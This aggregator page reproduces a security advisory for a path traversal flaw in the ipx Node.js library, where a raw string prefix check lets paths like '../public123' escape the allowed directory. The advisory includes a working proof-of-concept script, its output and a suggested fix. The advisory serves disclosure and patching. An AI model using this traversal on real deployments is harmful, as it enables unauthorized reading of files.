Security
Headlines
HeadlinesLatestCVEs

Headline

GHSA-mm3p-j368-7jcr: IPX Allows Path Traversal via Prefix Matching Bypass

Summary

The approach used to check whether a path is within allowed directories is vulnerable to path prefix bypass when the allowed directories do not end with a path separator. This occurs because the check relies on a raw string prefix comparison.

PoC

  • setup
mkdir ~/public123
move a png file under ~/public123 with name test.png
cd
npm i ipx
  • main.js
import { createIPX, ipxFSStorage } from "ipx";

const ipx = createIPX({
  storage: ipxFSStorage({ dir: "./public" }),
});


(async () => { 
    {
        const source = await ipx("../public123/test.png"); // access file outside ./public dir because of same prefix folder
        const { data, format } = await source.process();
        console.log(format) // print image data
    }
    {
        try {
            const source = await ipx("../publi123/test.png"); // forbidden path: the prefix is not the same
            const { data, format } = await source.process();
            console.log(data)
        } catch (err) {
            console.log(err.message) // Forbidden path:
        }

    }

})()
  • node main.js
png
Forbidden path: /../publi123/test.png

Impact

Path Traversal

Possible Fix

Check if the dir ends with / (path separator) and if not, add before calling startsWith

ghsa
Open in Source
#nodejs#js

Summary

The approach used to check whether a path is within allowed directories is vulnerable to path prefix bypass when the allowed directories do not end with a path separator. This occurs because the check relies on a raw string prefix comparison.

PoC

  • setup

    mkdir ~/public123 move a png file under ~/public123 with name test.png cd npm i ipx

  • main.js

import { createIPX, ipxFSStorage } from "ipx";

const ipx = createIPX({ storage: ipxFSStorage({ dir: “./public” }), });

(async () => { { const source = await ipx(“…/public123/test.png”); // access file outside ./public dir because of same prefix folder const { data, format } = await source.process(); console.log(format) // print image data } { try { const source = await ipx(“…/publi123/test.png”); // forbidden path: the prefix is not the same const { data, format } = await source.process(); console.log(data) } catch (err) { console.log(err.message) // Forbidden path: }

}

})()

  • node main.js

    png Forbidden path: /…/publi123/test.png

Impact

Path Traversal

Possible Fix

Check if the dir ends with / (path separator) and if not, add before calling startsWith

References

  • GHSA-mm3p-j368-7jcr
  • unjs/ipx@81693dd

ghsa: Latest News

GHSA-3x3q-ghcp-whf7: Template Secret leakage in logs in Scaffolder when using `fetch:template`
ghsa